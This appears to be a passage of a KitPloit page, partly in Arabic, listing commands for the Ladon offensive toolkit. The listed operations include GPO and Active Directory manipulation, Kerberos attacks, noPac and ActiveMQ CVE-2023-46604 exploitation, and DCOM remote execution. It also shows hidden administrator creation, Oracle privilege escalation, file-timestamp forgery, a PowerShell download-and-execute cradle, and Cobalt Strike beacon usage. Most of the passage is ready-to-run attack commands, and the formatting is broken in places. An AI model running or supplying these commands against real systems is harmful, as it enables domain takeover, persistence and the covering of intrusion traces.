Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,CN=Users,DC=testad,DC=com" --DstDN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,OU=IT Support,DC=testad,DC=com" --DstDN "CN=Users,DC=testad,DC=com"

Ladon SharpGPO --Action RemoveOU --OUName "IT Support"
Ladon SharpGPO --Action RemoveOU --DN "OU=IT Support,DC=testad,DC=com"


Ladon SharpGPO --Action GetGPO
Ladon SharpGPO --Action GetGPO --GPOName testgpo

Ladon SharpGPO --Action NewGPO --GPOName testgpo

Ladon SharpGPO --Action RemoveGPO --GPOName testgpo
Ladon SharpGPO --Action RemoveGPO --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action GetGPLink
Ladon SharpGPO --Action GetGPLink --DN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action GetGPLink --GPOName testgpo
Ladon SharpGPO --Action GetGPLink --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action GetSecurityFiltering --GPOName testgpo
Ladon SharpGPO --Action GetSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"

Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"
240 الحصول على معلومات موقع IIS بنقرة واحدة```Bash

Ladon IisInfo

root@kitploit:~
##### 241 إلغاء تسلسل LDAP لخادم ويب مخصص للاختراق```Bash	
Ladon web 800 ldap=192.168.1.8:800
242 خادم WEB مخصص للاختراق RMI إلغاء التسلسل```Bash

Ladon web 800 rmi=192.168.1.8

root@kitploit:~
##### 243 إضافة مسؤول عبر API (تجاهل تعطيل net وnet1 في النظام)```Bash	
Ladon AddAdmin admin$ 123456
244 إضافة مستخدم عبر API (تجاهل تعطيل net و net1.exe في النظام)```Bash

Ladon AddUser admin$ 123456

root@kitploit:~
##### 245 حذف المستخدم عبر API (تجاهل تعطيل net وnet1.exe في النظام)```Bash	
Ladon DelUser admin$
246 هجمات Kerberos لاختراق المجال عبر Rubeus

مثل طلبات TGT/طلبات ST/AS-REP Roasting/Kerberoasting/هجمات التفويض/التذاكر الذهبية/التذاكر الفضية/التذاكر الماسية/تذاكر الياقوت الأزرق/إلخ```Bash Ladon Rubeus

root@kitploit:~
##### 247 noPac اختراق المجال وتصعيد الامتيازات داخله CVE-2021-42287/CVE-2021-42278```Bash	
CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter

/domain /user /pass argument needed for scanning
/dc /mAccount /nPassword argument needed for exploitation

Examples:
  Ladon.exe noPac scan -domain htb.local -user domain_user -pass 'Password123!'
  Ladon.exe noPac -dc dc02.htb.local -mAccount demo -mPassword Password123!
  Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo /mPassword Password123!
  Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt
248 SharpGPOAbuse```Bash

Ladon SharpGPOAbuse

root@kitploit:~
##### 249 SharpSphere التفاعل مع نظام تشغيل الضيف للأجهزة الافتراضية المُدارة بواسطة vCenter وتنفيذ الأوامر```Bash	
Ladon SharpSphere

  No verb selected.

  dump        Snapshot and download memory dump file

  list        List all VMs managed by this vCenter

  execute     Execute given command in target VM

  c2          Run C2 using C3's VMwareShareFile module

  upload      Upload file to target VM

  download    Download file from target VM

  help        Display more information on a specific command.

  version     Display version information.
250 تنفيذ الأوامر عن بُعد عبر Dcom MMC20```Bash

Ladon MmcExec host cmdline Ladon MmcExec 127.0.0.1 calc Ladon MmcExec 127.0.0.1 Y2FsYw==

root@kitploit:~
##### 251 تنفيذ الأوامر عن بُعد عبر Dcom: ShellWindows```Bash	
Ladon ShellExec host cmdline
Ladon ShellExec 127.0.0.1 calc
Ladon ShellExec 127.0.0.1 Y2FsYw==
252 تنفيذ الأوامر عن بُعد عبر Dcom في ShellBrowserWindow```Bash

Ladon ShellBrowserExec host cmdline Ladon ShellBrowserExec 127.0.0.1 calc Ladon ShellBrowserExec 127.0.0.1 Y2FsYw==

root@kitploit:~
##### 253 Smtp Ntlm استكشاف معلومات النظام (المنافذ 25 و465 و587)```Bash	
Ladon 192.168.1.8/24 SmtpInfo
254 استكشاف معلومات نظام HTTP/S Ntlm```Bash

Ladon 192.168.1.8/24 HttpInfo

root@kitploit:~
##### 255 ActiveMQ CVE-2023-46604 استغلال RCE```Bash	
Ladon CVE-2023-46604 -i 192.168.1.8 -u http://192.168.1.1/poc.xml
256 DomainLog DomainUserIP الاستعلام عن بُعد عن IP مستخدمي المجال```Bash
root@kitploit:~
   Ladon DomainLog -d 7
   Ladon DomainLog -h ip -d 7
   Ladon DomainLog -h ip -d 7 -grep user
   Ladon DomainLog -h ip -u username -p password -d 7
   Ladon DomainLog -h ip -u username -p password -d 7 -all
   Ladon DomainLog -h ip -u username -p password -d 7 -f user -o C:\path\res

ult.txt

root@kitploit:~
##### 257 كشف ما إذا كان المستخدم مسؤول Lotus```Bash	
Ladon LotusAdmin http://192.168.1.1
Ladon LotusAdmin http://192.168.1.1/adm.nsf
258 خادم HTA تشغيل بنقرة واحدة الوصول إلى DOC يمكنه أيضًا تنفيذ HTA```Bash

Ladon HtaSer Ladon HtaSer 8080

root@kitploit:~
##### 259 ConfVer ConfluenceVer كشف إصدار Confluence```Bash	
Ladon 192.168.1.8/24 ConfVer
Ladon http://192.168.1.8:8080 ConfVer
Ladon url.txt ConfVer
260 FindAD يُستخدم للبحث عن مواقع تسجيل دخول مستخدمي Active Directory وتعداد مستخدمي المجال```Bash

Ladon FindAD Ladon pveFindADUser

root@kitploit:~
##### 261 أداة رفع الصلاحيات عن بُعد لقاعدة بيانات Oracle المشغّل الرسمي >=.net 4.8```Bash	
Ladon OracleCmd2 192.168.1.8 1521 orcl admin 123456 whoami
262 أداة رفع صلاحيات قاعدة بيانات Oracle عن بُعد — 3 طرق لرفع الصلاحيات بضغطة واحدة```Bash

Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m1 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m2 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m3 whoami

root@kitploit:~
##### BuildCS تجميع ديناميكي لملفات الكود C#```Bash	
Ladon BuildCS exe.cs exe
Ladon BuildCS dll.cs dll
Ladon BuildCS exe.cs dat
تعديل وقت الملف تحديد وقت الملف

Usage: Ladon UpdateFileTime <file_path> ```Bash Ladon UpdateFileTime E:\Ladon911\Ladon.exe "2024-09-11 09:11:00"

root@kitploit:~
##### تعديل وقت الملف نسخ وقت الملف```Bash
Ladon CopyFileTime E:\Ladon911\LadonExp.exe E:\Ladon911\Ladon.exe

إصدار PowerShell Ladon.ps1

0x001 تنفيذ Cmd تفاعلي```Bash

powershell Import-Module .\Ladon.ps1 Ladon OnlinePC

root@kitploit:~
#### 0x002 التنفيذ المحلي غير التفاعلي```Bash	
powershell -exec bypass Import-Module .\Ladon.ps1;Ladon whoami
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass Import-Module .\Ladon.ps1;Ladon whoami

0x003 تنفيذ التحميل في الذاكرة عن بُعد```Bash

powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon OnlinePC"

root@kitploit:~
#### 0x004 Bypass تجاوز سياسة التنفيذ الافتراضية لـ PowerShell```Bash	
powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon OnlinePC

0x005 فحص المنافذ المخصصة```Bash

powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

root@kitploit:~
### Cobalt Strike  Ladon.ps1

CS Beacon يكتشف المضيفات النشطة```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon ICMP
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon NbtInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon SmbInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon LdapInfo

CS Beacon فحص المنافذ المخصص```bash shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

root@kitploit:~
CS Beacon MS17010 استكشاف الثغرات```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon 192.168.1.1/24 ms17010

مثال

http://k8gege.org/Ladon/example-en.html

أحدث إصدار

أحدث إصدار بخط الختم الصغير: http://k8gege.org/Ladon/update.txt

النجوم عبر الزمن

النجوم عبر الزمن

تنزيل الأداة